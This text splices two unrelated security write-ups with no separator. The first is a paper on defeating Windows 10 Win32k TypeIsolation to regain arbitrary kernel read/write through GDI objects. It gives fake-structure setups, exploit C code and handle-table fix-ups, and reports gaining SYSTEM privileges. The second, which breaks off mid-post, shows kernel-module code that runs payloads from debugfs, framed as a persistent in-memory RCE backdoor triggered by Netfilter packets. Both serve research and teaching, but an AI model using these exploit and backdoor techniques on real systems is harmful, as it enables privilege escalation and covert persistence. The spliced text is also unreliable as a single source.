Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, exploiting GDI objects to achieve arbitrary kernel memory read/write has become more and more common in kernel exploitation. In many vulnerability classes, such as pool overflows, arbitrary writes, out-of-bounds writes, use-after-free and double free, GDI objects can be used to read and write arbitrary memory. We call this the GDI data-only attack.

Microsoft introduced Win32k TypeIsolation after Windows 10 build 1709 to mitigate the GDI data-only attack in kernel exploitation. While reversing win32kbase.sys I discovered a mistake in Win32k TypeIsolation that makes the GDI data-only attack work again for certain common vulnerability classes. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

The GDI data-only attack is one of the common methods used in kernel exploitation. By modifying GDI object member variables through a common vulnerability, you can use the GDI APIs in win32k to achieve arbitrary memory read and write. At present, the two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


typedef struct _SURFOBJ {
    DHSURF dhsurf;
    HSURF hsurf;
    DHPDEV dhpdev;
    HDEV hdev;
    SIZEL sizlBitmap;
    ULONG cjBits;
    PVOID pvBits;
    PVOID pvScan0;
    LONG lDelta;
    ULONG iUniq;
    ULONG iBitmapFormat;
    USHORT iType;
    USHORT fjBitmap;
} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


typedef struct _PALETTE64 {
    BASEOBJECT64 BaseObject;
    FLONG flPal;
    ULONG32 cEntries;
    ULONG32 ulTime;
    HDC hdcHead;
    ULONG64 hSelected;
    ULONG64 cRefhpal;
    ULONG64 cRefRegular;
    ULONG64 ptransFore;
    ULONG64 ptransCurrent;
    ULONG64 ptransOld;
    ULONG32 unk_038;
    ULONG64 pfnGetNearest;
    ULONG64 pfnGetMatch;
    ULONG64 ulRGBTime;
    ULONG64 pRGBXlate;
    PALETTEENTRY *pFirstColor;
    struct _PALETTE *ppalThis;
    PALETTEENTRY apalColors[3];
} PALETTE64;

In the kernel structures of Bitmap and Palette, the two member variables relevant to the GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Both point to the object's data field, and data can be read from or written to that field through the GDI APIs. As long as we modify one of these members to point to an arbitrary memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write that address.

There are already many technical papers on using Bitmap and Palette to complete the GDI data-only attack. Since that is not the focus of this paper, I will not go into more depth here; the relevant information can be found in the references in part five.

3 Win32k TypeIsolation

The GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used with most common vulnerability classes. Microsoft added a new mitigation in Windows 10 rs3 build 1709: Win32k TypeIsolation, which manages GDI objects through a doubly-linked list and separates the GDI object header from its data field. This not only mitigates the classic pool-fengshui technique of creating a predictable pool hole, occupying it with a GDI object and modifying member variables through a vulnerability, but also mitigates attack scenarios that modify other member variables of the GDI object header to enlarge the controllable range of the data field, because the header and the data field are no longer adjacent.

The win32k TypeIsolation mechanism can be summarized by the following figure:

Here I will explain the important parts of the win32k TypeIsolation mechanism. For its detailed operation, including the allocation and release of GDI objects, refer to part five.

In win32k TypeIsolation, GDI objects are managed uniformly through the CSectionEntry doubly-linked list. The view field points to a 0x28000-byte memory region in which the GDI object headers are kept. The view field is managed as a view array of size 0x1000, and when a GDI object is allocated, an RTL_BITMAP is used as the basis for assigning the GDI object to a particular slot in a view field.

In CSectionEntry, bitmap_allocator points to a CSectionBitmapAllocator, which stores xored_view, xor_key and xored_rtl_bitmap, where xored_view ^ xor_key points to the view field and xored_rtl_bitmap ^ xor_key points to the RTL_BITMAP.
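Based on this reverse engineering and the debugger dumps later in this paper, the CSectionEntry layout can be sketched roughly as follows; the field names and offsets are my own reconstruction for win32kbase.sys 10.0.16299.371 and may differ on other builds:

typedef struct _CSECTIONENTRY {
    struct _CSECTIONENTRY *next;                        // +0x00
    struct _CSECTIONENTRY *previous;                    // +0x08
    PVOID unknown;                                      // +0x10
    PVOID view;                                         // +0x18, 0x28000-byte view holding GDI object headers
    struct _CSECTIONBITMAPALLOCATOR *bitmap_allocator;  // +0x20
} CSECTIONENTRY, *PCSECTIONENTRY;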

In RTL_BITMAP, bitmap_buffer_ptr points to the bitmap buffer, which records the state of each slot in the view field: 0 means free and 1 means in use. When a GDI object is allocated, win32k traverses the CSectionEntry list starting from win32kbase!gpTypeIsolation and uses the CSectionBitmapAllocator to check whether the current view field has a free slot. If it does, the new GDI object header is placed in that view field.

I did some reverse-engineering research on the implementation of GDI object allocation and release in the CTypeIsolation and CSectionEntry classes, and I found a mistake. TypeIsolation traverses the CSectionEntry doubly-linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI SURFACE objects stored in the view field, but it does not check the validity of the CSectionEntry->view and CSectionEntry->bitmap_allocator pointers. In other words, if we can construct a fake view and a fake bitmap_allocator, and we can use a vulnerability to make CSectionEntry->view and CSectionEntry->bitmap_allocator point to those fake structures, we can reuse GDI objects to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of this attack scenario. HEVD is a practice driver developed by the HackSys Team that contains typical kernel vulnerabilities. It includes an arbitrary write vulnerability, which we will use as the example for this attack scenario.

Attack scenario:

First, look at the allocation of CSectionEntry. A CSectionEntry is allocated from a 0x40-byte session paged pool chunk; the allocation is implemented in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes
.text:00000001C002AC8F mov r8d, 6F736955h ; Tag
.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType
.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag // Allocate 0x40 session paged pool

In other words, we can still use pool fengshui to create a predictable session paged pool hole that will be occupied by a CSectionEntry. In the HEVD arbitrary-write scenario, we use tagWND to create a stable pool hole and use HMValidateHandle to leak the tagWND kernel object address. Because this vulnerability instance is an arbitrary write, leaking the kernel object address makes the attack scenario easier to follow; in many other attack scenarios, we only need pool fengshui to create a predictable pool hole.


kd> g // make a stable pool hole by using tagWND
Break instruction exception - code 80000003 (first chance)
0033:00007ff6`89a61829 cc int 3
kd> p
0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]
kd> p
0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax
kd> r rax
rax=ffff862e827ca220
kd> !pool ffff862e827ca220
Pool page ffff862e827ca220 region is Unknown
 ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04
 ffff862e827ca150 size: 10 previous size: 150 (Free) Free
 ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu
*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580
    Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp
 ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8
 ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

0xffff862e827ca220 is a stable session paged pool hole; it will be released later and left in a free state.


kd> p
0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]
kd> p
0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax
kd> !pool ffff862e827ca220
Pool page ffff862e827ca220 region is Unknown
 ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04
 ffff862e827ca150 size: 10 previous size: 150 (Free) Free
 ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu
*ffff862e827ca210 size: 40 previous size: b0 (Free) *Ustx
    Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp
 ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8
 ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need a CSectionEntry to occupy 0xffff862e827ca220. This relies on a feature of TypeIsolation: as described earlier, when a GDI object is requested, win32k traverses the CSectionEntry list and determines whether each view field has a free slot. If the view field of a CSectionEntry is full, traversal continues with the next CSectionEntry, and if the view fields of all CSectionEntrys in the CTypeIsolation doubly-linked list are full, NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, after preparing the pool hole, we allocate a large number of GDI objects to fill up all existing CSectionEntry view fields (as sketched below), ensuring that a new CSectionEntry is created and occupies our 0x40-byte pool hole.
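A minimal sketch of that spray, assuming the pool hole has already been groomed (the object count is arbitrary; in practice you keep allocating until a new CSectionEntry claims the hole):

HBITMAP spray[5000];
for (int i = 0; i < 5000; i++) {
    // every new SURFACE header consumes a slot in some CSectionEntry view
    spray[i] = CreateBitmap(0x20, 0x20, 1, 32, NULL);
}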


kd> g // create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry
kd> !pool ffff862e827ca220
Pool page ffff862e827ca220 region is Unknown
 ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04
 ffff862e827ca150 size: 10 previous size: 150 (Free) Free
 ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu
*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso
    Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create
 ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator, and use the arbitrary write to make the member pointers of the CSectionEntry occupying the session paged pool hole point to the fake structures we constructed.

The view fields of the new CSectionEntrys created while we allocated the large number of GDI objects may already be fully or partially occupied by SURFACEs. If our fake structures describe the view field as empty, we can deceive TypeIsolation into placing the next GDI object's SURFACE at a location we know.

We use VirtualAllocEx to allocate memory in userspace to store the fake structures, and we set the memory protection to READWRITE.


kd> dq 1e0000 // fake pushlock
00000000`001e0000 00000000`00000000 00000000`0000006c
kd> dq 1f0000 // fake view
00000000`001f0000 00000000`00000000 00000000`00000000
00000000`001f0010 00000000`00000000 00000000`00000000
kd> dq 190000 // fake RTL_BITMAP
00000000`00190000 00000000`000000f0 00000000`00190010
00000000`00190010 00000000`00000000 00000000`00000000
kd> dq 1c0000 // fake CSectionBitmapAllocator
00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f
00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f
00000000`001c0020 00000001`00000001 00000001`00000000

Here, 0x1f0000 is the fake view field and 0x1c0000 is the fake CSectionBitmapAllocator; the fake view field will be used to store the GDI object. The CSectionBitmapAllocator needs careful construction, because we use it to convince TypeIsolation that the CSectionEntry we control has free view slots.


typedef struct _CSECTIONBITMAPALLOCATOR {
    PVOID pushlock;            // +0x00
    ULONG64 xored_view;        // +0x08
    ULONG64 xor_key;           // +0x10
    ULONG64 xored_rtl_bitmap;  // +0x18
    ULONG bitmap_hint_index;   // +0x20
    ULONG num_commited_views;  // +0x24
} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

Compare the CSectionBitmapAllocator structure above with the contents at 0x1c0000. I chose 0xdeadbeefdeadb33f as xor_key; any value works as long as xor_key ^ xored_view and xor_key ^ xored_rtl_bitmap point to the fake view field and the fake RTL_BITMAP. While debugging I found that pushlock must point to a valid structure, otherwise a bugcheck is triggered, so I allocated the memory at 0x1e0000 to hold the pushlock contents.

As described earlier, bitmap_hint_index is used as a shortcut to index into the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the starting index in the RTL_BITMAP. In the same way, let's look at the structure of RTL_BITMAP.


typedef struct _RTL_BITMAP {
    ULONG64 size;          // +0x00
    PVOID bitmap_buffer;   // +0x08
} RTL_BITMAP, *PRTL_BITMAP;

kd> dyb fffff322401b90b0
          76543210 76543210 76543210 76543210
          -------- -------- -------- --------
fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00
fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00
fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40
fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff
fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff
fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff
fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff
fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff
kd> dq fffff322401b90b0
fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0 // ptr to rtl_bitmap buffer
fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff
fffff322`401b90d0 ffffffff`ffffffff

Here I picked a valid RTL_BITMAP as a template. The first member is the RTL_BITMAP size, the second member points to bitmap_buffer, and the buffer that immediately follows describes, bit by bit, the state of the view slots. To deceive TypeIsolation we set all of these bits to 0, indicating that every view slot of the current CSectionEntry is free; see the fake RTL_BITMAP structure at 0x190000.
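Putting the pieces together, the userspace setup can be sketched as follows. The fixed base addresses and the xor key simply mirror the debug session above, and the offsets come from the structures already described; this is an illustrative sketch rather than the exact exploit code:

#define XOR_KEY 0xdeadbeefdeadb33fULL

BYTE *fakepushlock   = (BYTE *)VirtualAlloc((LPVOID)0x1e0000, 0x1000,  MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
BYTE *fakeview       = (BYTE *)VirtualAlloc((LPVOID)0x1f0000, 0x28000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
BYTE *fakertl_bitmap = (BYTE *)VirtualAlloc((LPVOID)0x190000, 0x1000,  MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
BYTE *fakeallocator  = (BYTE *)VirtualAlloc((LPVOID)0x1c0000, 0x1000,  MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

// fake RTL_BITMAP: 0xf0 bits, buffer right behind the header, left all zero (= every slot free)
*(DWORD64 *)(fakertl_bitmap + 0x00) = 0xf0;
*(DWORD64 *)(fakertl_bitmap + 0x08) = (DWORD64)(fakertl_bitmap + 0x10);

// fake CSectionBitmapAllocator
*(DWORD64 *)(fakeallocator + 0x00) = (DWORD64)fakepushlock;                // pushlock
*(DWORD64 *)(fakeallocator + 0x08) = (DWORD64)fakeview ^ XOR_KEY;          // xored_view
*(DWORD64 *)(fakeallocator + 0x10) = XOR_KEY;                              // xor_key
*(DWORD64 *)(fakeallocator + 0x18) = (DWORD64)fakertl_bitmap ^ XOR_KEY;    // xored_rtl_bitmap
*(DWORD *)(fakeallocator + 0x20)   = 0;                                    // bitmap_hint_index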

Next, we only need to modify the CSectionEntry's view and bitmap_allocator pointers through HEVD's arbitrary write vulnerability.


kd> dq ffff862e827ca220 // before trigger
ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300
ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000
ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000
kd> g // trigger vulnerability, CSectionEntry->view and CSectionEntry->bitmap_allocator are modified
Break instruction exception - code 80000003 (first chance)
0033:00007ff7`abc21e35 cc int 3
kd> dq ffff862e827ca220
ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300
ffff862e`827ca230 ffffc383`08613880 00000000`001f0000
ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we allocate a GDI object normally by calling CreateBitmap to create a bitmap object, and then observe the state of the fake view field.


kd> g
Break instruction exception - code 80000003 (first chance)
0033:00007ff7`abc21ec8 cc int 3
kd> dq 1f0280
00000000`001f0280 00000000`00051a2e 00000000`00000000
00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000
00000000`001f02a0 00000000`00051a2e 00000000`00000000
00000000`001f02b0 00000000`00000000 00000002`00000040
00000000`001f02c0 00000000`00000080 ffff862e`8277da30
00000000`001f02d0 ffff862e`8277da30 00003f02`00000040
00000000`001f02e0 00010000`00000003 00000000`00000000
00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object has been placed in the fake view field, so we can read it directly from userspace. Now we only need to modify the pvScan0 of the bitmap kernel object stored in the fake view and then call GetBitmapBits/SetBitmapBits to read and write any memory address.
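Because the SURFACE header now lives in our fake view, its pvScan0 field can be patched directly from user mode before each GDI call. The read/write helpers used in the fix-up code below can therefore be sketched like this (pvScan0Field is the user-mode address of pvScan0 inside the fake view, fakeview + 0x280 + 0x48 in this debug session; this is a sketch, not the exact exploit code):

VOID ArbitraryRead(HBITMAP bitmap, DWORD64 pvScan0Field, DWORD64 src, BYTE *out, DWORD len)
{
    *(DWORD64 *)pvScan0Field = src;    // point pvScan0 at the address to read
    GetBitmapBits(bitmap, len, out);   // the kernel copies len bytes from src for us
}

VOID ArbitraryWrite(HBITMAP bitmap, DWORD64 pvScan0Field, DWORD64 dst, BYTE *in, DWORD len)
{
    *(DWORD64 *)pvScan0Field = dst;    // point pvScan0 at the address to write
    SetBitmapBits(bitmap, len, in);    // the kernel copies len bytes from `in` to dst
}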

Summarize the exploit process:

Fix for full exploit:

While completing the exploit, I found that a BSOD was sometimes generated, which greatly reduced the stability of the GDI data-only attack. For example:


kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while performing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck
Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.




Debugging Details:
------------------

OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx

FAULTING_IP:
win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+47
ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)
.cxr 0xffff8c8f89e98cf0
rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080
rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660
rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000
 r8=ffff8c8f89e996b8  r9=0000000000000001 r10=7ffffffffffffffc
r11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680
r14=ffffd7a7424dca70 r15=0000000000000027
iopl=0 nv up ei pl nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206
win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+0x47:
ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After much tracing, I found that the main reason for the BSOD is that the fake structures we created with VirtualAllocEx live in the address space of our own process. That memory is not shared with other processes, so after we modify the CSectionEntry's view and CSectionBitmapAllocator pointers through the vulnerability, any other process that creates a GDI object will also traverse the CSectionEntry list. When it reaches the CSectionEntry we modified, it bugchecks because those userspace addresses are invalid in its context. So I applied my first fix right after the vulnerability is triggered.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;
DWORD64 fix_bitmapbits2 = 0xffffffffffff;
DWORD64 fix_number = 0x2800000000;
CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);
CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);
CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);
CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);
CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified bitmap_hint_index and the RTL_BITMAP so that when TypeIsolation traverses the CSectionEntry list it believes the view field of the fake CSectionEntry is currently full and skips this CSectionEntry.

The current CSectionEntry has been modified by us, so even after we finish the exploit and the process exits, the CSectionEntry is still part of the CTypeIsolation doubly-linked list, while the process memory allocated with VirtualAllocEx is freed on exit. This would lead to all kinds of unknown errors. Since we already have arbitrary read/write, I applied a second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));
ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));
LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSectionPrevious);
LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);
ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));
ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next and unlinked the current CSectionEntry, so that when GDI object allocation traverses the CSectionEntry list it no longer encounters the fake CSectionEntry.

After completing the two fixes, the GDI data-only attack can be used to read and write any memory address. Here I directly obtained SYSTEM privileges on the latest Windows 10 rs3, but once again a BSOD was triggered when the process fully exited. After analysis, I found that this BSOD occurs because, after the unlink, the GDI handle is still present in the GDI handle table: process teardown looks up the corresponding kernel object through the CSectionEntry list in order to free it, but the CSectionEntry holding our bitmap kernel object has been unlinked, which causes the BSOD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI objects of the current process. The call chain associated with SURFACE is as follows:


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef
0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14
10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87
11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface releases the SURFACE kernel object referenced by the GDI handle table. We need to find the entry in the GDI handle table for the HBITMAP stored in the fake view and set it to 0x0; this makes bDeleteSurface skip the subsequent free processing and move on to the next GDI object via HmgNextOwned. The key code for locating the HBITMAP's position in the GDI handle table is in HmgSharedLockCheck:


v4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 * ((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8)v6 + 8);

From this I reconstructed the full calculation for locating the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning that this requires the base address of win32kbase.sys. At Low IL we would need an info-leak vulnerability, but at Medium IL I used NtQuerySystemInformation to leak the win32kbase.sys base address and compute the gpHandleManager address. After finding the position of the target bitmap object in the GDI handle table and setting it to 0x0, the full exploit is complete.
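To make the calculation above concrete, here is my reading of it as C. KernelRead64 is a hypothetical wrapper around the ArbitraryRead helper, gpHandleManagerOffset is the offset of win32kbase!gpHandleManager inside the leaked module, and all offsets follow the decompiled HmgSharedLockCheck, so treat them as specific to this build:

DWORD64 mgr   = KernelRead64(win32kbase + gpHandleManagerOffset);  // *win32kbase!gpHandleManager
DWORD64 t1    = KernelRead64(mgr + 0x10);
DWORD64 t2    = KernelRead64(t1 + 0x8);
DWORD64 dir   = KernelRead64(t2 + 0x18);
DWORD64 page  = KernelRead64(dir + ((hbitmap & 0xffff) >> 8) * 8);
DWORD64 entry = page + (hbitmap & 0xff) * 0x10;   // 0x10-byte entries; the SURFACE pointer sits at +0x8

// zero the SURFACE pointer so bDeleteSurface skips this handle on process exit
DWORD64 zero = 0;
ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, entry + 0x8, (BYTE *)&zero, sizeof(zero));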

Kernel exploitation is getting harder and harder, and a full exploit often requires the support of other vulnerabilities, such as an info leak. Compared to out-of-bounds writes, use-after-free, double free and write-what-where, a pool overflow is more complicated in this scenario because it has to deal with CSectionEntry->previous and CSectionEntry->next, but it is not impossible to use this scenario with a pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.


Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

#include <linux/debugfs.h>   /* debugfs_create_blob, struct debugfs_blob_wrapper */
#include <linux/slab.h>      /* kmalloc, kfree */
#include <linux/string.h>    /* strlen */

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer at a club. The bouncer only lets club-goers wearing green badges through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

